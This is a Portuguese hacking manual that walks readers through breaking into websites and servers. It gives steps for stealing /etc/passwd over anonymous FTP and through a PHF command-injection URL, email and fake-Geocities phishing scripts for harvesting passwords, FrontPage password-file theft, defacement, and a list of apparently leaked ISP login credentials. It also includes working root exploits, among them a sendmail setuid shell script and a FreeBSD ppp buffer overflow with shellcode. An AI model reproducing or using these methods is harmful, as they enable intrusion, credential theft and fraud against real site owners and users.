Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos faz é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo [email protected]. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..

6-PHF :

O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser :

http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd

Apenas isso e pronto!

7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):

Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."

Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!

8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2):

Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito:

Você terá que trocar para :

Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail.

Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuração DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i") Então escreva no dominio-->COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html

O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail!

Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo.

9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR:

Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear. Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto! Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.

10-TENET E EXPLOITS :

Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin.... Vou listar alguns exploits abaixo :

Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.

-----------------------------------------------------------------------------------------------------------------------------

cat << _EOF_ >/tmp/x.c

#define RUN "/bin/ksh"

#include

main()

{

execl(RUN,RUN,NULL);

}

_EOF_

#

cat << _EOF_ >/tmp/spawnfish.c

main()

{

execl("/usr/lib/sendmail","/tmp/smtpd",0);

}

_EOF_

#

cat << _EOF_ >/tmp/smtpd.c

main()

{

setuid(0); setgid(0);

system("chown root /tmp/x ;chmod 4755 /tmp/x");

}

_EOF_

#

#

gcc -O -o /tmp/x /tmp/x.c

gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c

gcc -O3 -o /tmp/smtpd /tmp/smtpd.c

#

/tmp/spawnfish

kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed

s/"[ ]*"// |cut -d" " -f1`

rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd

/tmp/x.c

sleep 5

if [ -u /tmp/x ] ; then

echo "leet..."

/tmp/x

fi

----------------------------------------------------------------------------------------------------------

Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver

os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada

usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas

nos seus inbox. Efetivamente deletando o lockfile respectivo.

Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie

~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém.

Agora precisa fazer um " echo "+ +" > /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.

--------------------------------------------------------------------------------------------------------

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine

catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep

pine

hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors

- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05

.302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine

catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep

pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts

/tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine

catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep

pine

hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4

+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD".

#include

#include

#include

#define BUFFER_SIZE 156 /* size of the bufer to

overflow */

#define OFFSET -290 /* number of bytes to jump

after the start

of the buffer */

long get_esp(void) { __asm__("movl %esp,%eax\n"); }

main(int argc, char *argv[])

{

char *buf = NULL;

unsigned long *addr_ptr = NULL;

char *ptr = NULL;

char execshell[] =

"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"

/* 16 bytes */

"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"

/* 16 bytes */

"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"

/* 20 bytes */

"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

/* 15 bytes, 57 total */

int i,j;

buf = malloc(4096);

/* fill start of bufer with nops */

i = BUFFER_SIZE-strlen(execshell);

memset(buf, 0x90, i);

ptr = buf + i;

/* place exploit code into the buffer */

for(i = 0; i < strlen(execshell); i++)

*ptr++ = execshell[i];

addr_ptr = (long *)ptr;

for(i=0;i < (104/4); i++)

*addr_ptr++ = get_esp() + OFFSET;

ptr = (char *)addr_ptr;

*ptr = 0;

setenv("HOME", buf, 1);

execl("/usr/sbin/ppp", "ppp", NULL);

}

Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar. Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar. Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas.

11-HACKEANDO UMA HP QUE VOCÊ TENHA CADASTRO NO MESMO SERVIDOR.(2)

Esse texto eu li na internet e achei bem interessante mostrar na minha home page. Eu nao vou escrever esse metodo por mim porque prefiro deixar ele intacto, pois por descuido eu poderia corromper alguma informação. Infelizmente o texto é em ingles! Desculpe se você nao fala...

Exploiting Net Adminstration CGI (taken from a text by Lord Somer)

Well since nethosting.com either shutdown or whatever I figured what the hell before I forget how I did the more recent hacks etc... I'd tell you how so maybe you'll find the same sys elsewhere or be able to use it for ideas.

Basically Nethosting.com did all it's administration via cgi's at net-admin.nethosting.com, well you need an account, card it if necessary, log in to net-administration, you'll see crap like ftp administration, email, etc... who really cares about e-mail so we'll go to ftp. Click on ftp administration. Lets say you were logged in as 7thsphere.com your url would be something like:

http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl

Just change the 7thsphere.com to any domain on the sys or if in the chmod cgi just del that part but keep the + sign and you edit the /usr/home dir. In the ftp administration make a backdoor account to that domain by creating an ftp who's dir is / since multiple /// still means /.

Once you have your backdoor have fun. Oh yeah and in the email you can add aliases like I did to rhad's e-mail account at 7thsphere, why the hell is he on that winsock2.2 mailing list?

Well the basic theory of this type of exploitation is that:

the cgi is passed a paramater which we change to something else to edit it's info

since it uses the stuff after the + to check that it's a valid logged in account(like hotmail does), it dosen't check the password again.

multiple ///'s in unix just mean a /, thus we can get access to people's dir or the entire /usr/home dir

Eu queria avisar aqui que todos os items relacionados aqui realmente funcionam! Se você nao conseguir, foi porque cometeu algum erro, ou fez "mal feito". Muita gente tem reclamado que não funciona... Se você entendeu tudo perfeitamente você pode hackear quase qualquer home page.

Hackeando extensões FrontPage

Estou aqui para explicar à vocês como penetrar em servidores rodando Microsoft Frontpage Extensions. A principal razão pela qual eu não incluí sub-capítulos no conteúdo foi porque... eu estou muito cansado.

Encontrando servidores que rodam extensões Frontpage.

Usando seu browser, vá até algum destes sites:

metacrawler.com, yahoo.com, google.com, excte.com

Procure por haccess.htl <or> service.pwd

NOTA:

-> service.pwd é o arquivo padrão para senhas

-> haccess.htl contém o diretório atual do arquivo password se o service.pwd é falso ou as senhas estão em shadow

Note também que o service.pwd não é o único arquivo de senhas que pode ser encontrado. admin.pwd, users.pwd, Authors.pwd, administrators.pwd, também podem ser encontrados.

Ok. Depois de procurar, você encontrará uma lista com cerca de 100 sites rodando extensões frontpage. Clique em um dos links. Se você clicou em algum arquivo haccess.htl, você verá algo assim:

-Front Page-

Options None

<Limit GET POST PUT>

order deny,allow

deny from all

</Limit>

AuthName default_realm

AuthUserFile c:/frontpage\ webs.content/_vti_pvt/service.pwd

AuthGroupFile c:/frontpage\ webs.content/_vti_pvt/service.pwd

Nós vamos focalizar as duas últimas linhas. O AuthUserFile. Este é o diretório atual do arquivo password ativo (não é falso ou shadowed). Agora, faça o download do arquivo de senhas através do diretório especificado.

Volte aos resultados da procura. Se você clicou em um dos links e foi levado ao arquivo de senhas você verá algo do tipo:

systemphuc:aBcDeFj

Copie isso e coloque em formato DES (UNIX):

systemphuc:aBcDeFj:0:0:comments:/:/bin/bash

Agora, crackeie isso usando seu cracker de senhas unix favorito. Eu gosto de usar John the Ripper. Ok, agora você tem um login e senha válidos. Isso pode ser usado de duas formas. A primeira é o IPC$ share (será discutido em outra oportunidade) e a Segunda é hackear o servidor de extensões frontpage. Para fazer isso abra o seu FrontPage, vá em File>Open ou Open Frontpage Web put, isso mostrará uma pequena “bola” opcional, marque-a e depois coloque a “bola” no endereço IP do servidor ou do endereço http (isso é meio confuso, mas é assim que se faz). Depois clique em conectar. Se o servidor não tiver senha você estará conectado e apto a alterar a página. Mas se o software foi instalado adequadamente e o username/senha forem solicitados... coloque o username/password que eu te mostrei como descobrir e crackeie. Clique em ok, agora você estará apto a alterar as páginas.

Você pode colocar mensagens na página como:

"im a big stupid fuck i hacked you page, ha ha ha... ha ha ha".

Vulnerabilidade no aplicativo FrontPage

Versão: 1.0

Autor: [email protected]

26 de Janeiro de 2000

Ao longo dos últimos meses vem se verificando um crescimento na exploração, com sucesso, de vulnerabilidades no aplicativo Front Page. Estas vulnerabilidades permitem a um usuário remoto obter acesso `a arquivos e diretorios de um servidor WEB, permitindo obtenção dos arquivos de senhas dos administradores do serviço Front Page, ou a modificação direta do conteúdo das páginas publicadas.

2. Impacto

Nota-se que o ambiente Windows com IIS 4.0 é seguramente onde tem ocorrido maior número de ataques, mas outros ambientes que permitam atualização via Front Page, (módulo para servidor Apache em Windows ou Unix, por exemplo) também são vulneráveis.

3. Solução

- Retire os arquivos de exemplos que acompanham a distribuição

- Aplique as correções ou atualize a versão do aplicativo Front Page

[http://www.microsoft.com/security]

- Habilite autenticação ao Extension Server

- Monitore atividades, principalmente em arquivos e diretórios usados pelo

Front Page, tais como: _vti_bin, _vti_pvt, _vti_inf.html, admin.dll, etc.

- Proteja o arquivo de senhas 'service.pwd'

Ex:

<Files ~ "^\service.pwd">

Order deny,allow

Deny from all

</Files>

>>SENHAS PIRATAS<<

1 - Tente não conectar-se entre 9:00 e 222:00.

,MXCM   

2 - Nunca, mas nunca, use mais de 2 horass por dia, mesmo assim é muito, o melhor é tentar descobrir se a senha que você esta usando é "full", se for, se deu de bem, geralmente o "usuario" nem liga para seu saldo de horas gastas, mas não exagere.

3 - Tenha mais de uma senha de acesso, noo mínimo 3, para caso de algo errado com uma das senhas você tem mais 2 para poder ir correndo atrás de mais senhas e ficar mais calmo.

4 - Se você perceber que esta "cainddo" muito, não entre mais nesse dia que você caiu, entre só no outro dia, se o "usuário normal" estiver conectado também, geralmente, um dos dois que usam a mesma senha vão cair, toda hora um caí e se ele cair de mais ele pode desconfiar e acabar trocando a senha e babal pra você.

5 - Seja discreto, não vai chegar numa saala de Chat se achando o maior e ficar falando para todo mundo que esta usando um senha pirata.

6 - Use a cabeça.

Agora vamos as mais esperadas, você tava loco pra chegar aqui, num tava? É isso, "EU QUERO É VER O OKO"

Servidor Fone Usuário Senha Estado

Uninet (061) 327 2882 ieak unisys96 DF

Mandic (011) 870 0100 ppp novo São Paulo

IBM (011) 887 9001 <nada> <nada> São Paulo

UOL 0800 15 8002 universo online (Brasil)

Essas são senhas de inscrição, se você ainda não sabe nem pegar senhas de inscrição, vai aprender agora, é só pensar um pouco, vamos lá:

Você já deve ter comprado uma dessas revista de Informática, algumas delas geralmente vem com um Cd de horas grátis de internet, aí você já deve ter executado o programa, ele pede para instalar a merda do Internet Explorer e mais monte de coisa, aí no final, geralmente, reinicia o computador aí é executado altomaticamente o Internet Explorer, ELE VAI DISCAR PARA UM LOCAL PARA PODER FAZER SUA INSCRIÇÃO... e esse local é um servidor de internet... já sabe até o que fazer né não?

Para você conseguir achar os dados da inscrição, você tem que saber em qual arquivo tá guardado os dados sobre a mesma, use um editor Hexadecimal, ou use o Edit do MS-DOS. Visualize arquivo por arquivos do diretório onde fica a Instalação das horas grátis, procure por numeros de telefone, quando você achar você vai acabar vendo alguma coisa por perto haver com "senha", bom aí tá sua senha de inscrição, e o usuário também deve tá por perto, mas para melhorar sua vida, geralmente, esses dados (telefone, usuário e senha) ficam num arquivo chamado "signup.???", é signup <ponto> alguma coisa, eu esqueci a extensão, mas não há muito arquivo com esse nome. Visualize ele, até pelo Notepad mesmo, gostou? muito bom né nao? Dentro dele vem tudo dividido certinho, tudo prontinho pra usar... bom, você intendeu né? se não intendeu leia denovo!

Quase sempre essas senhas só deixam ficar conectadas por um certo tempo, depois o servidor desconectão você, o tempo de conexão é mais ou menos uns 15 minutos, é o tempo que você usa pra fazer a inscrição, mas se você for inteligente e criativo, com esses 15 minutos você pode tentar invadir um servidor da sua cidade e pegar as senhas dele, mas cuidado em, não exagere...

>> IP Spoffing<<

O IP Spoofing ficou famoso após ter sido a atração principal do ataque à rede de Tsutomu Shimomura, um dos maiores especialistas de segurança dos Estados Unidos, quando através dele, na noite de natal de 1994, o mais famoso e procurado hacker americano, Kevin Mitnick, invadiu a sua rede particular e roubou alguns dos seus programas, dentre eles, um software de programação dos celulares Oki, que lhe permitiria ter um controle total sobre suas ligações clandestinas e escutas de celulares.

Esta história, é claro, foi desmentida por Kevin, que apesar do sabido interesse no referido telefone, não demonstrava aptidão suficiente para realizar um ataque desta grandeza. Apesar deste tipo de ataque ter sido teorizado há muitos anos, somente na metade desta década ele ficou mundialmente conhecido e, em 1997 já era o 4° método de invasão mais utilizado. Hoje encontram-se ferramentas que automatizam esta fatigante tarefa, e tem-se conhecimento de ataques de spoofing concretizados em menos de meio minuto!

Disfarce. É isto que este ataque faz. Muitas comunicações entre computadores na Internet se baseiam em "parceiros" confiáveis. Um computador X pode manter uma comunicação com um computador Y de forma que não seja necessária a constante verificação de autenticidade entre eles. O hacker, então, se disfarça, dizendo para o computador X que "ele" é o computador Y. Desta forma o computador X vai aceitar seus comandos tranqüilamente, enquanto ele deita e rola pelo sistema.

Um pouco mais de detalhes: os pacotes IP possuem um endereço destino e um endereço origem. Normalmente o endereço origem reflete a realidade, mas nada impede que um hacker altere este pacote para que ele pareça ter vindo de outro lugar. Só que não é tão simples assim... Além de enganar o destino, neste caso o computador X, é necessário que se sobrecarregue o computador Y, para que ele não responda às mensagens de X, o que faria com que Y dissesse: "Mas eu não te perguntei nada!", e X cancelaria a conexão.

Faz-se necessária, ainda, uma "previsão" do número de seqüência mandado por X. Este número é enviado por X ao originador da conexão (supostamente o Y). Mas Y não irá responder, devido à sobrecarga explicada anteriormente. Então o hacker deve prever o número de seqüência mandado por X para que seja enviado um novo pacote com estes números de seqüência, fingindo novamente ter sido enviado por Y, e forjando a autenticação.

A previsão deste número de seqüência é um processo demorado e criativo. Durante a negociação da conexão, os computadores trocam informações para efetuarem o "handshake" ou "aperto de mão". Dentre as informações trocadas estão os números de seqüência, que devem ser repetidos para o destino, para que este se certifique da autenticidade da conexão. O que o hacker pode fazer é o seguinte: enviar, através de um pacote legítimo, com o endereço de origem verdadeiro, vários pedidos de conexão à X. Este responde com um número de seqüência para que o hacker o repita e efetue a conexão, mas a máquina de origem (o hacker) não tem privilégios e não lhe interessa fechar esta conexão. Então ele não responde a estes pacotes de X, apenas os guarda e verifica seu número de seqüência.

Após vários pedidos de conexão com X, o hacker pode "aprender" como X gera seus números e então mandar um pedido de conexão, desta vez com o endereço de origem sendo Y (o computador confiável). Obviamente, o hacker não vai receber os pacotes de X com os números de seqüência, pois estes irão para o endereço de origem (computador Y, que, a esta altura, precisa estar sobrecarregado para não repondê-los), mas, com base nos cálculos anteriores, o hacker prevê e manda o número de seqüência correto para o computador X, fechando a conexão.

Esta conexão é unidirecional, pois todas as respostas de X serão destinadas ao computador Y, e não ao computador do hacker. Então o hacker age "às cegas", pois não recebe nenhum tipo de retorno de X, pelo menos enquanto configura X para aceitar conexões do seu próprio computador. Ao terminar, o hacker tira o disfarce: desfaz a conexão falsa com X, e faz uma legítima, agora que X pode aceitar conexões confiáveis através do computador do hacker, com todos os privilégios possíveis e imagináveis.

Há dois inconvenientes neste ataque: o trabalho de achar um padrão nos números de seqüência e a falta de retorno do computador invadido. Entretanto, existe ainda uma outra categoria de spoofing, que, apesar das condições pouco comuns, é muito mais eficiente. Neste tipo de ataque, um computador de pouca importância em uma rede é invadido por um método simples qualquer (infelizmente, os computadores que não guardam informações importantes geralmente são esquecidos no projeto de segurança) e, estando localizado no mesmo meio físico onde ocorre uma comunicação entre duas máquinas importantes, ele poderá "captar" todo o tráfego deste meio físico. Com isso ele saberá os números de seqüência de ambos os lados, podendo interceptar este diálogo, pondo-se no lugar de um dos computadores da conexão confiável, tendo total acesso aos dados mais sigilosos.

Este tipo de ataque só pode ser eficazmente prevenido através de um controle apurado de TODOS os computadores da rede local, que compartilham o mesmo meio físico, ou através de uma comunicação confiável baseada em aplicativos de criptografia.

Invasão por IP

Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção. conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamento de Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se atá mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador

Manual Hacker

Aviso

Em primeiro lugar: Eu não me responsabilizo pelo uso indevido das informações, exemplos, descrições, enfim tudo o que estiver contido aqui.
TUDO o que você fizer com o material contido aqui sera de plena responsabilidade SUA. Tudo aqui contido é apenas de carácter EDUCATIVO.Repito, eu não me responsabilizo por NADA que você fizer.

------------------------------------------------------------------

Índice

------------------------------------------------------------------

1. Introdução
1.1 Falta de informação
1.2 Vamos ao que interessa!
2. Definições
2.1 O que é um Hacker?
2.2 O que é Hacking?
2.3 Por quê hack?
2.4 A diferença entre Hackers e Crackers
2.5 Regras Hackers
2.6 Onde começar

3. Entendendo os sistemas
3.1 Telenet
3.2 Sistemas Operacionais
3.3 Definições

4. Vírus, Trojan Horses e Worms
4.1 Vírus
4.2 Trojan Horse (Cavalo de Tróia)
4.3 Worm

5. PGP

6. HACK (A melhor parte)

6.1 - HACK PC
6.1.1 Password do BIOS
6.1.2 Password do Windows
6.1.3 Password do screen saver do Windows
6.1.4 Proteção de documentos do Word
6.1.5 Proteção de arquivos ZIP
6.1.6 Proteção de arquivos ARJ
6.1.7 Copiando digitações ou macros de um micro
6.1.8 Um editor hexadecimal
6.1.9 Escondendo informações

6.2 - HACK MODEM
6.2.1 Encontrando o sistema
6.2.2 Sistemas UNIX
6.2.3 Sistemas VAX/VMS
6.2.4 Sistemas PRIME
6.2.5 Rede Novell
6.2.6 Passwords muito utilizados
6.2.7 E-mail

7. O Autor
7.1 Como contatar o Autor

8. Documentos utilizados na criação do Manual

----------------------------------------------------------------

1 - Introdução

----------------------------------------------------------------

1.1 - Falta de informação
Todos os textos que eu via na WEB ou em BBS's tinham uma falta de informação inacreditável. Na verdade, eu imagino que eles
sabiam e estavam regulando informação (o que eu não concordo, as informações devem ser compartilhadas!), ou não sabiam porra nenhuma e só diziam as drogas que viam em outras páginas.
Então, nesse manual, estou disponibilizando todas as informações para  os Hackers novatos!
Obs.: Os lamers são bem vindos contanto que sejam esforçados e queiram aprender.

1.2 - Vamos ao que interessa!
Bom... agora vamos ao que interessa! Você encontrar nesse manual, aquilo que você sempre quis saber e ninguém te dizia. As
fórmulas milagrosas para invadir sistemas, enfim... TUDO! Faça bom proveito!

----------------------------------------------------------------

2 - Definições

----------------------------------------------------------------

2.1 - O que é um Hacker
Tudo isto que vocês pensam dos Hackers foi criado possivelmente com a publicidade gerada pelos filmes que tratam do assunto,
como: Jogos de Guerra  e agora com os mais recentes A rede e Hackers.
São aqueles possuem muitos, senão todos, os conhecimentos acima - isso não é uma regra, mas não usam para os mesmos propósitos e
as vezes auxiliam os próprios técnicos em segurança e os webmasters a proteger seus sistemas. São de uma inteligência e determinação muito superiores a de uma pessoas comuns, pois eles são capazes de passarem semanas ou até mesmo meses
lendo e aprendendo de um novo sistema, apenas com o propósito de saber e utilizar esses sistemas.
Um Hacker, é um sabichão. Justamente por saber muito, ele tem condições de "aprontar" por ai. O Hacker sempre quer aprender mais um  pouco e normalmente acaba perdendo horas de sono por isso. É aquele que tem prazer em sentar em frente de seu micro e ficar horas e horas buscando nem sabe o quê.
Naturalmente xereto, o Hacker adora invadir sistemas alheios para simplesmente preencher seu ego. Muitas de suas façanhas podem ser discutiveis ao nível social, mas o verdadeiro Hacker não costuma estragar nada, subtrair
programas, ou sequer roubar informações em detrimento de outrem.
O Hacker é, acima de tudo, um intelectual informatizado.

2.2 - O que é Hacking?
Hacking é o ato de penetrar em sistemas de computadores para ganhar mais conhecimento e entender como é seu funcionamento. Em
português hack significa corte, entalhe.

2.3 - Por quê hack?
Como já foi dito anteriormente, o hack é feito para a aprimorar os conhecimentos de uma pessoa em relação a um sistema de computadores. Hackers não destrõem, não roubam e nem espionam informações por
dinheiro.

2.4 - A diferença entre Hackers e Crackers<
Os Crackers são os que a imprensa confunde com os hackers, são aqueles que invadem sistemas com o propósito de roubar programas ou simplesmente apagá-los, são inteligentes, porém, em sua maioria, prepotentes, pois deixam mensagens do tipo: "Eu sou o melhor ! / Apaguei e escapei!"entre outras, deixando na maioria das vezes um rastro que possibilita sua
captura. Possuem conhecimentos semelhantes aos phreaks mais com propósitos um
pouco mais destrutivos.
Um exemplo recente foi a prisão de Kevin Mitnick, o "ladrão K(?) cibernético mais procurado da história, capturado pelo FBI com a ajuda do Tsutomu Shimomura, o técnico de segurança mais respeitado da história (?). Um Cracker é o que utiliza de suas habilidades em proveito próprio, não importando quantos ou quais prejuízos cause. Este é um elemento perigoso, que muitas vezes acaba por se auto-destruir. Normalmente coloca vírus em computadores, descobre senhas para vender a empresas, destrói informações, corrompe sistemas e apronta tudo que pode.

2.5 - Regras Hackers
1- Nunca destruir nenhum sistema.
2- Nunca alterar nenhum dos arquivos do sistema, a não ser que seja necessário para esconder a sua presença ou garantir a sua entrada
posteriormente.
3- Não compartilhe com ninguém seus projetos hackers, com
ninguém
4- Em uma BBS, não é aconselhável que você discuta seus projetos hackers.
BBS's podem ser monitoradas pelo governo.
5- Nunca dê nomes ou telefones reais em uma BBS.
6- Nunca deixe seu apelido em um sistema que você entrou.
7- NãO entre em computadores governamentais.
8- Nunca converse sobre seus planos hackers com outra pessoa do telefone de sua casa.
9- Seja atento. Mantenha todo o seu material hacker em um lugar seguro.
10- Para se tornar um verdadeiro hacker você deve simplesmente praticar.
